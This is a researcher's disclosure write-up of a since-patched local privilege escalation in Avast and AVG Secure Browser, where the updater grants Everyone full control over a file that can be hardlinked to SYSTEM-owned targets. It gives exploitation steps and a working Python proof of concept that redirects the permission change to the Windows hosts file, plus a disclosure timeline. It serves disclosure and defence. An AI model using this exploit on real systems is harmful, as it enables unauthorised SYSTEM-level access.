Vulnerability Introduction
I recently discovered a vulnerability in the Avast and AVG Secure Browser that allows low privileged users to gain access to any file on the system. Successful exploitation results in Full Control permissions for the user group Everyone. This vulnerability can lead to code execution as NT AUTHORTY\SYSTEM as the user could gain write access to any DLL or EXE loaded by SYSTEM. The vulnerability lies within the AVG Secure Browser version 76.0.870.102 and Avast Secure Browser with version 76.0.1659.101. In July of 2016 Avast Software, acquired AVG Technologies explaining why the vulnerability existing in both products.
Avg & Avast Secure Browser
Avast Secure Browser is a web browser based on Chromium and developed by Avast. Its focus is on Internet security and privacy. Initially, Avast Secure Browser was bundled with paid versions of Avast Antivirus. In March 2016, Avast started bundling it with the free version as well. Avast Secure Browser was originally called “SafeZone” before being revamped and rebranded as “Avast Secure Browser” in early 2018. Before the revamp and rename, SafeZone’s design was similar to that of the Opera browser.
Discovering the Vulnerability
While monitoring the AVG Secure Browser with process monitor I discovered the AVGBrowserUpdate.exe would set permissions on a file Update.ini with the SetSecurityFile operation.
The file Update.ini is located in the folder C:\ProgramData\AVG\Browser\Update\ where a low privileged user is likely to have permissions. I was able to confirm this with icacls.exe and discovered the permissions are Full control and set to Everyone on the file in question.
The AVGBrowserUpdate.exe uses the SetSecurityFile API operation by SYSTEM on a file in which the user has Full control allowing the user to hijack any file owned by SYSTEM using hardlinks. Furthermore, this can lead to code execution as SYSTEM by replacing a DLL/EXE loaded or ran by SYSTEM.
In my analysis, I discovered a user can initiate the SetSecurityFile operation on the Update.ini file at any time by viewing the “About” section of the browser. When the About page is opened the AvastBrowserUpdate.exe file will set permissions on the Update.ini file.
Thanks to the work of James Forshaw of Google Project Zero we can then use his SymbolicLink Testing Toolkit to create a hardlink to a file we want to hijack as a low privileged user. The great thing about his toolkit is it allows you to create links to files in which you do not have appropriate permissions. Thus, allowing us to create a link to a file we normally would not have permissions to modify.
Exploitation
All we have to do at this point is create a hardlink from the file at C:\ProgramData\AVG\Browser\Update\Update.ini to any file we want to hijack, such as a DLL loaded by SYSTEM. Once that is complete open the about page in the browser and the SetSecurityFile operation will then execute on the hijacked file giving Full Permissions to user group Everyone.
As a PoC exploit I created a python script that will hijack the C:\Windows\System32\drivers\etc\hosts file as a regular user does not have write permissions to this file. Once the file has been hijacked it will open the Windows HOSTS file and add a new entry illustrating the vulnerability. Again, we could easily hijack any EXE file or DLL file which can lead to code execution as SYSTEM.
- First, we begin by deleting the directory and its contents located at C:\ProgramData\AVG\Browser\Update. This is a requirement to create our hardlink to the HOSTS file as it will create a directory junction.
- Next, we use the CreateSymlink.exe to create a hardlink from the C:\ProgramData\AVG\Browser\Update\Update.ini to the C:\Windows\System32\drivers\etc\hosts.
- Finally, we initiate the SetSecurityFile operation by the AVGBrowserUpdate.exe. A low privileged user can instigate this action by opening the AVG Secure Browser. Next, browse to Settings, Help and About AVG Secure Browser, and click About AVG Secure Browser. At this point, the AVGBrowserUpdate.exe will set permissions on the linked file pointing to C:\Windows\System32\drivers\etc\hosts allowing our exploit to access and add a new entry to the SYSTEM owned file thus completing the attack.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 | import shutil import sys from pathlib import Path import time import subprocess from subprocess import Popen, PIPE #User Home Dir HOME = str(Path.home()) #Path for CreateSymlink.exe PTHSYMLNK = HOME + "\\CreateSymlink.exe" VULNPATH = "C:\\ProgramData\\AVG\\Browser\\Update\" VULNFILE = "Update.ini" #This could be any file, EXE executed by SYSTEM, DLL Imported by SYSTEM and so on. OWNFILE = "C:\\Windows\\System32\\drivers\\etc\\hosts" #Delete all files and folder print("[+] Delete Update Folder") try: shutil.rmtree(VULNPATH) except IOError as e: print("[!] Unable to delete folder: " + str(e)) sys.exit() except: print("[!] Unknown error") sys.exit() #Create link file print("[+] Creating link to " + OWNFILE) proc = subprocess.Popen([PTHSYMLNK, VULNPATH + VULNFILE, OWNFILE], stdout=PIPE, stderr=PIPE) #Write data to file print("[+] Waiting for permission hijack") print("[+] Launch AVG Secure Browser -> Settings -> Help and About AVG Secure Browser -> About AVG Secure Browser") while True: try: with open(OWNFILE, "a") as fle: fle.write("127.0.0.1 example.com") fle.close() break except IOError as e: time.sleep(1) continue print("[+] Permission hijack successful") proc.kill() print("[+] Attack Complete") subprocess.call("notepad.exe " + OWNFILE, shell=True) |
Disclosure Timeline
10/01/2019 – Issue reported to Avast
10/03/2019 – Acknowledgement of the issue and case number provided
12/19/2019 – Avast informed me patch was in final testing
01/21/2020 – Avast informed me patch was released and CVE provided
https://www.avast.com/bug-bounty-credits/en/a-tribute-to-our-security-research-community
Add Comment